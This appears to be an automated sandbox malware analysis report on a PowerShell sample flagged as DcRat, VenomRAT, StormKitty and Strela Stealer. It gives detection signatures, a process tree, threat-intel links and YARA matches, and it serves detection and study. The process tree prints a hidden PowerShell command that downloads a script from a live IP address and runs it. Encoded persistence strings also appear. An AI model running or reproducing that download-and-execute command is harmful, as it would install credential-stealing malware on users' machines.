Edit tour

Windows Analysis Report
wrcaf.ps1

Overview

General Information

Sample name:	wrcaf.ps1
Analysis ID:	1583430
MD5:	898d5189a1dc57fa7a80b4d986ef77c9
SHA1:	aeb3667119b2fda564f498d26c04758caf44b1c5
SHA256:	61270d6564a80eff42a00bf542fc79224949fb27df8c1d6d3acbaa6000fc8577
Tags:	185-149-146-164bookingps1SPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected BrowserPasswordDump

Yara detected DcRat

Yara detected Keylogger Generic

Yara detected Powershell download and execute

Yara detected StormKitty Stealer

Yara detected Strela Stealer

Yara detected VenomRAT

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Compiles code for process injection (via .Net compiler)

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Powershell drops PE file

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: PowerShell Download and Execution Cradles

Suspicious execution chain found

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 7424 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wrcaf.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7628 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

Package.exe (PID: 7644 cmdline: C:\Windows\Temp\Package.exe MD5: 2696D944FFBEF69510B0C826446FD748)

cmd.exe (PID: 7680 cmdline: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7728 cmdline: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 7856 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 7876 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3794.tmp" "c:\Users\user\AppData\Local\Temp\envi5f4j\CSC9C647CAA9F2542549472B496F61651E.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

RegAsm.exe (PID: 7924 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7932 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7940 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 8080 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 204 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, 404KeyLogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x2d3f65:$a1: havecamera 0x3269dd:$a2: timeout 3 > NUL 0x32a394:$a3: START "" " 0x32a93b:$a3: START "" " 0x32a816:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x32a8b3:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
dump.pcap	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x326175:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x321be3:$s6: VirtualBox 0x333262:$s6: VirtualBox 0x32e579:$s8: Win32_ComputerSystem 0x333136:$s8: Win32_ComputerSystem 0x32ae44:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x32aee1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x32aff6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x32b0de:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.4119044743.0000000003009000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DcRat_2	Yara detected DcRat	Joe Security
00000006.00000002.1753216083.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.1753216083.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x87c18:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x8c454:$s9: Win32_Process Where ParentProcessID= 0x8c071:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8c10e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c223:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8c30b:$cnc4: POST / HTTP/1.1
0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x241208:$a1: havecamera 0x28c032:$a2: timeout 3 > NUL 0x28f3b5:$a3: START "" " 0x28f8ca:$a3: START "" " 0x28f7a5:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x28f842:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x293606:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x28b8a2:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x287a16:$s6: VirtualBox 0x297595:$s6: VirtualBox 0x292fb2:$s8: Win32_ComputerSystem 0x2974fb:$s8: Win32_ComputerSystem 0x2900de:$s9: Win32_Process Where ParentProcessID= 0x28fcfb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28fd98:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x28fead:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x28ff95:$cnc4: POST / HTTP/1.1
00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x242388:$a1: havecamera 0x53fda8:$a1: havecamera 0x28d1b2:$a2: timeout 3 > NUL 0x58abd2:$a2: timeout 3 > NUL 0x290535:$a3: START "" " 0x290a4a:$a3: START "" " 0x58df55:$a3: START "" " 0x58e46a:$a3: START "" " 0x290925:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x58e345:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x2909c2:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x58e3e2:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x294786:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x5921a6:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x28ca22:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x58a442:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x288b96:$s6: VirtualBox 0x298715:$s6: VirtualBox 0x5865b6:$s6: VirtualBox 0x596135:$s6: VirtualBox 0x294132:$s8: Win32_ComputerSystem 0x29867b:$s8: Win32_ComputerSystem 0x591b52:$s8: Win32_ComputerSystem 0x59609b:$s8: Win32_ComputerSystem 0x29125e:$s9: Win32_Process Where ParentProcessID= 0x58ec7e:$s9: Win32_Process Where ParentProcessID= 0x290e7b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x58e89b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x290f18:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x58e938:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x29102d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x58ea4d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x291115:$cnc4: POST / HTTP/1.1 0x58eb35:$cnc4: POST / HTTP/1.1
00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x32f368:$a1: havecamera 0x37a192:$a2: timeout 3 > NUL 0x37d515:$a3: START "" " 0x37da2a:$a3: START "" " 0x37d905:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x37d9a2:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x381766:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x379a02:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x375b76:$s6: VirtualBox 0x3856f5:$s6: VirtualBox 0x381112:$s8: Win32_ComputerSystem 0x38565b:$s8: Win32_ComputerSystem 0x37e23e:$s9: Win32_Process Where ParentProcessID= 0x37de5b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x37def8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x37e00d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x37e0f5:$cnc4: POST / HTTP/1.1
Process Memory Space: powershell.exe PID: 7424	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1ca07c:$b2: ::FromBase64String( 0x1ca0ae:$b2: ::FromBase64String( 0x1ca0e0:$b2: ::FromBase64String( 0x18361:$s1: -join 0x18ac1:$s1: -join 0x33f0b:$s1: -join 0x40fe0:$s1: -join 0x443b2:$s1: -join 0x44a64:$s1: -join 0x46555:$s1: -join 0x4875b:$s1: -join 0x48f82:$s1: -join 0x497f2:$s1: -join 0x49f2d:$s1: -join 0x49f5f:$s1: -join 0x49fa7:$s1: -join 0x49fc6:$s1: -join 0x4a816:$s1: -join 0x4a992:$s1: -join 0x4aa0a:$s1: -join 0x4aa9d:$s1: -join
Process Memory Space: powershell.exe PID: 7728	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security
Process Memory Space: powershell.exe PID: 7728	JoeSecurity_Keylogger_Generic_1	Yara detected Keylogger Generic	Joe Security
Process Memory Space: powershell.exe PID: 7728	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7728	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: powershell.exe PID: 7728	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: powershell.exe PID: 7728	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: powershell.exe PID: 7728	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
Process Memory Space: powershell.exe PID: 7728	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
Process Memory Space: powershell.exe PID: 7728	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 7728	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x8a1c6:$b2: ::FromBase64String( 0x8a1fa:$b2: ::FromBase64String( 0x8a22e:$b2: ::FromBase64String( 0xc55a0:$b2: ::FromBase64String( 0xc55d4:$b2: ::FromBase64String( 0xc5608:$b2: ::FromBase64String( 0x2473a3:$b2: ::FromBase64String( 0x2473d7:$b2: ::FromBase64String( 0x24740b:$b2: ::FromBase64String( 0x397fa2:$b2: ::FromBase64String( 0x397fd6:$b2: ::FromBase64String( 0x39800a:$b2: ::FromBase64String( 0x3a7125:$b2: ::FromBase64String( 0x3a7159:$b2: ::FromBase64String( 0x3a718d:$b2: ::FromBase64String( 0x3be97c:$b2: ::FromBase64String( 0x3be9b0:$b2: ::FromBase64String( 0x3be9e4:$b2: ::FromBase64String( 0x34a87:$s1: -join 0x41b5c:$s1: -join 0x44f2e:$s1: -join
Process Memory Space: powershell.exe PID: 7728	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x1a586b:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x36e038:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: powershell.exe PID: 7728	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x14961f:$s6: VirtualBox 0x311df4:$s6: VirtualBox 0x1a5541:$s8: Win32_ComputerSystem 0x1a775e:$s8: Win32_ComputerSystem 0x36dd0e:$s8: Win32_ComputerSystem 0x36ff2b:$s8: Win32_ComputerSystem 0x44cb4d:$s8: Win32_ComputerSystem 0x44cdc0:$s8: Win32_ComputerSystem 0x451869:$s8: Win32_ComputerSystem 0x45190c:$s8: Win32_ComputerSystem 0x1a3e97:$s9: Win32_Process Where ParentProcessID= 0x36c664:$s9: Win32_Process Where ParentProcessID= 0x433035:$s9: Win32_Process Where ParentProcessID= 0x1a3caa:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x36c477:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x432e48:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1a3cf8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x36c4c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x432e96:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1a3d82:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x36c54f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Process Memory Space: RegAsm.exe PID: 7940	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 7940	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: RegAsm.exe PID: 7940	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7940	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7940	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
Process Memory Space: RegAsm.exe PID: 7940	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
Process Memory Space: RegAsm.exe PID: 7940	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 7940	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x119659:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: RegAsm.exe PID: 7940	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xbd40d:$s6: VirtualBox 0x26ab:$s8: Win32_ComputerSystem 0x2774:$s8: Win32_ComputerSystem 0x21fb9:$s8: Win32_ComputerSystem 0x2208e:$s8: Win32_ComputerSystem 0x229e8:$s8: Win32_ComputerSystem 0x22b59:$s8: Win32_ComputerSystem 0x29221:$s8: Win32_ComputerSystem 0x2a9f2:$s8: Win32_ComputerSystem 0x2aa5a:$s8: Win32_ComputerSystem 0x2da9c:$s8: Win32_ComputerSystem 0x2dbcc:$s8: Win32_ComputerSystem 0x3ea77:$s8: Win32_ComputerSystem 0x42e4a:$s8: Win32_ComputerSystem 0x42e5f:$s8: Win32_ComputerSystem 0x43713:$s8: Win32_ComputerSystem 0x55a5a:$s8: Win32_ComputerSystem 0x55b38:$s8: Win32_ComputerSystem 0x55c27:$s8: Win32_ComputerSystem 0x56885:$s8: Win32_ComputerSystem 0x568dd:$s8: Win32_ComputerSystem
Click to see the 43 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.powershell.exe.4e51434.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.powershell.exe.4e51434.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x1a784:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x1a6e7:$s2: L2Mgc2NodGFza3MgL2
6.2.powershell.exe.4e51434.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x18c2d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x18c9f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x18d29:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x18dbb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x18e25:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x18e97:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x18f2d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x18fbd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
